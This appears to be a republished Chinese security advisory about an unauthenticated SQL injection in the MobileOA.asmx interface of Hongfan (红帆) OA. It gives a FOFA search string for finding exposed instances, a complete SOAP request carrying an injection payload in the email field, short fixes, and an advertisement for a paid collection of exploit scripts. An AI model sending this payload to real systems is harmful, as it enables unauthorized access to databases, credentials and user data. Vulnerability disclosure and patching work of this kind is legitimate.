文章总结: 文档披露红帆OAMobileOA.asmx接口存在SQL注入漏洞,攻击者无需认证即可通过构造恶意SOAP请求获取数据库敏感信息或写入木马。漏洞复现部分提供完整的HTTP请求包及注入Payload示例,并给出关闭互联网暴露面、设置访问权限、升级版本等修复建议。文末附带漏洞检测工具推广及免责声明。 综合评分: 65 文章分类: 漏洞分析,WEB安全,威胁情报,应急响应,安全工具
红帆OA MobileOA.asmx SQL注入漏洞
原创
北雪网络安全 北雪网络安全
北雪网络安全
2026年4月29日 13:23 山东
在小说阅读器读本章
去阅读
本文章所描述的内容仅供网络安全学习使用,任何人不允许学到技术内容进行非法系统测试,作者不对任何学习文章并进行非法操作的行为负责,由本人自己承担后果,本文章仅供技术学习。
01
更多内容
网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本:https://pc.fenchuan8.com/#/index?forum=110296
02
搜索引擎
Fofa:app=”红帆-ioffice”
03
漏洞复现
漏洞概述:由于红帆OA MobileOA.asmx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1Content-Type: text/xml; charset=utf-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Host: your-ip
<?xmlversion="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GeMrNewData xmlns="http://tempuri.org/"> <MobileOAEmailAddress>' AND 5079 IN(SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))--eqJq</MobileOAEmailAddress> </GeMrNewData> </soap:Body></soap:Envelope>
04
自查工具
05
修复建议
1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本
06
内部圈子
🛠️ 【知名漏洞实战圈,纯干货】🛠️
还在找公开漏洞POC而烦恼?还在为漏洞不会验证而发愁?还在为发现不了漏洞而自卑?这里漏洞圈子解决你的困惑! 目前已更新poc数量2500+
🎯 适用场景
▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****
⚠️ 重要声明:
▫️仅限合法授权测试,严禁违规使用
▫️虚拟资源服务,购买后不接受任何形式退款
▫️付款前请评估需求,慎重考虑
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北雪网络安全 北雪网络安全 北雪网络安全《红帆OA MobileOA.asmx SQL注入漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论